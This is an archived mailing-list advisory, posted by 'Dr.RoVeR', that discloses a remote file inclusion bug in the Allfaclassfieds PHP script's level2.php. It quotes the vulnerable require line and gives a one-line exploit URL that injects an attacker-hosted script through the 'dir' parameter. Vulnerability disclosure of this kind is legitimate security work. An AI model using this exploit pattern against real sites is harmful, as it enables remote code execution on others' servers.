<<< Date Index >>>     <<< Thread Index >>>

Allfaclassfieds (level2.php dir) remote file inclusion



Allfaclassfieds  (level2.php dir) remote file inclusion

 --
 Bug Found By Dr.RoVeR -->Arab48 Hacker

 Contact: Dr.RoVeR@xxxxxxxxxxxxxx
 ---

 Script: allfaclassfieds


 Download: http://scriptat.com/download.php?sid=718
 --

 Bug File: level2.php

 Bug code in line 4:
 require("$dir/admin/dp.php");

 --

 Exploit:
 http://site.com/[path]/admin/setup/level2.php?dir=[EvilScript]



-- 
_______________________________________________
Get your free email from http://www.hackermail.com